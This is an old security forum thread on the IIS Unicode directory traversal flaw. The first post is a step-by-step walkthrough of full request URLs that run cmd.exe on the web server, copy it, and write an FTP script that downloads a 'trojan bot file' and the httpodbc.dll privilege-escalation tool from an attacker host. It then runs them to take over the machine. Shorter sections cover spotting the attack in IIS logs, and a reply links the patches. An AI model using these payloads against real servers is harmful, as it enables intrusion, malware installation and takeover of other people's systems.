Unicode Vuln, How Its Hacked, How Its Used, How To See and FIX
Results 1 to 2 of 2

Thread: Unicode Vuln, How Its Hacked, How Its Used, How To See and FIX

  1. #1
    Member
    Join Date
    May 2003
    Posts
    35

    Unicode Vuln, How Its Hacked, How Its Used, How To See and FIX

    I had to add quotes and such because this BBS is messing with some stuff......

    i will try my best to use complete sentences like i learned in 3rd grade.

    I KNOW THIS IS AN OLD VULN, BUT MANY MANY MACHINES ARE STILL HACKED THIS WAY, SO IM POSTING IT. please patch yourselfs....


    disclamer : none of this information is to be used out of context, i am not responsible for how you use it, or what your mind choices to do with it. futhermore, its educational, and for that purpose only.

    First i will start with how it is done, then how it is used, then how to defend, and lastly, how to fix.

    The first step in hacking of iis unicode vuln machines, those vulnerable to the ../../..%255c../winnt/system32/cmd.exe type vulns, is finding them. Usually this is done by a custom scanner, or someone using other systems. The scanner starts by identifying the host computer, which usually uses random hosts and marks which ones return IIS 4.0 and IIS 5.0. After this part of the scan is complete, each host is scanned for some 200 unicode vuln's. Depending on which one's they find, will depend on how they are exploited. So, lets get into it.

    Lets say your doing this on yourself...(your the attacker)

    http://127.0.0.1/

    after you scan for vuln unicode strands, you see yourself as being vuln to

    http://127.0.0.1/scripts/.."%255c"../.."%255c"../.."%225c"../winnt/system32/cmd.exe

    which means your system is not secure against the unicode directory transversal and thus you can access a cmd prompt through it. At this point, the attacker, (i will refrain from using hacker, because it is hardly), will do a basic call of cmd.exe, something like


    http://127.0.0.1/scripts/.."%255c"../.."%255c"../.."%225c"../winnt/system32/cmd.exe?/c+dir+c:\

    which would display the contents of your C:\ drive.

    next, the attacker(you) would create your own copy of cmd.exe, so you dont have to deal with copy attribute problems.

    something like...

    http://127.0.0.1/scripts/.."%255c"../.."%255c"../.."%225c"../winnt/system32/cmd.exe?/c+copy+C:\winnt\system32\cmd.exe+C:\inetpub\scripts\temp.exe

    Next, there are two different ways to get the files they want onto your computer, one is too simple to explain, which is by using the tftp.exe service and remotly downloading off an tftp server. But it is not the most popular, for the simple reason it is harder to setup.

    Instead the next thing the attacker will do is create an ftp script to download files for you. usinng the echo commands, we create an ftp script.

    http://127.0.0.1/scripts/.."%255c"../.."%255c"../.."%225c"../inetpub/scripts/temp.exe?/c+echo+open+tempftp+21+>+C:\inetpub\scripts\temp.txt

    temp ftp being the ftp on which the files lay, 21 being the port

    http://127.0.0.1/scripts/.."%255c"../.."%255c"../.."%225c"../inetpub/scripts/temp.exe?/c+echo+login+>>+C:\inetpub\scripts\temp.txt

    login=ftp login info

    http://127.0.0.1/scripts/.."%255c"../.."%255c"../.."%225c"../inetpub/scripts/temp.exe?/c+echo+password>>+C:\inetpub\scripts\temp.txt

    password=ftp pass info

    http://127.0.0.1/scripts/.."%255c"../.."%255c"../.."%225c"../inetpub/scripts/temp.exe?/c+echo+get+temp.zip+>>+C:\inetpub\scripts\temp.zip

    downloading the trojan bot file.

    http://127.0.0.1/scripts/.."%255c"../.."%255c"../.."%225c"../inetpub/scripts/temp.exe?/c+echo+get+httpodbc.dll+>>+C:\inetpub\scripts\temp.txt

    httpodbc.dll is a common priv escalation priv exploit

    http://127.0.0.1/scripts/.."%255c"../.."%255c"../.."%225c"../inetpub/scripts/temp.exe?/c+echo+exit+>>+C:\inetpub\scripts\temp.txt

    http://127.0.0.1/scripts/.."%255c"../.."%255c"../.."%225c"../inetpub/scripts/temp.exe?/c+echo+quit+>>+C:\inetpub\scripts\temp.txt

    must quit and exit, or else proc hangs

    then, to send the command to download, simple use...

    http://127.0.0.1/scripts/.."%255c"../.."%255c"../.."%225c"../inetpub/scripts/temp.exe?/c+ftp.exe+-s:C:\inetpub\scripts\temp.txt

    and ftp.exe will use your script and download all your files.

    Next, the attacker will logon to wherever they have placed their files, in our case, C:\inetpub\scripts\temp.txt, the file must be accessable by the web..., but most are...

    http://127.0.0.1/scripts/httpodbc.dll

    they enter in their command to run,, in our case

    C:\inetpub\scripts\temp.zip (can be an exe if self extracting)

    httpodbc.dll returns with a positive and reporting that privs were escalated for the execution.

    This computer can now be completly controled and used however the attacker wants, some iis servers run connected to t3 as well, so lots of bw wasting.

    i wont go into anymore about how they are hacked for fear of being banned...
    i will answer more indepth questions in priv messages...



    Catching The attack:

    Easyest way to prevent this attack, is simple updates, which some dont use. There are many fixes for this problem, but still thousands of machines are attacked. If you notice your computer moving very slow, or using unusual ammounts of bandwidth. Another way, if you want to backtrack and see when you were attacked, look into the iis logs for anything resembling

    Get /.."%255c"../.."%255c"../.."%225c"../winnt/system32/cmd.exe 200

    if it is a 404 instead of a 200, then you are fine, a 200 simply means it returned positive.



    What the hell are these used for?:

    The most common thing these machines are used for is serving warez/porn. I have seen other, more sophisitcated things, such as bnc's, tunnels, irc servers, FXP servers, e-mail hosts, and just about as much as you can imagine.


    The most secure way to fix this problem, if you arnt infected, update, if you are, you most likly need to clean your whole system. Treat it as any other compromise.


    BOTTOM LINE:

    Please upgrade this stuff, its been out for almost 2 years, and im getting tired of seeing them online,, just because your behind a firewall, doesnt mean your safe from lame old attacks either....
    sectac
    The Hack Back Revolution
    irc.dal.net:#guesswhatyourhacked

  2. #2
    Senior since the 3 dot era
    Join Date
    Nov 2001
    Posts
    1,540
    Good post, perhaps usefull to include the links to the patches or sources?

    Folder traversal patch
    http://www.microsoft.com/technet/sec...n/MS00-078.asp

    IIS 5.0 patch
    http://www.microsoft.com/windows2000...62/default.asp

    IIS 4.0 patch
    http://www.microsoft.com/ntserver/nt...62/default.asp

    MS extended unicode bug, vulnerable systems list
    http://www.securityfocus.com/bid/1806

    thecorpz.org had a good tutorial with many links about these unicode risks but that site has no contents anymore, howvere google cache can be helpfull

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •  

 Security News

     Patches

       Security Trends

         How-To

           Buying Guides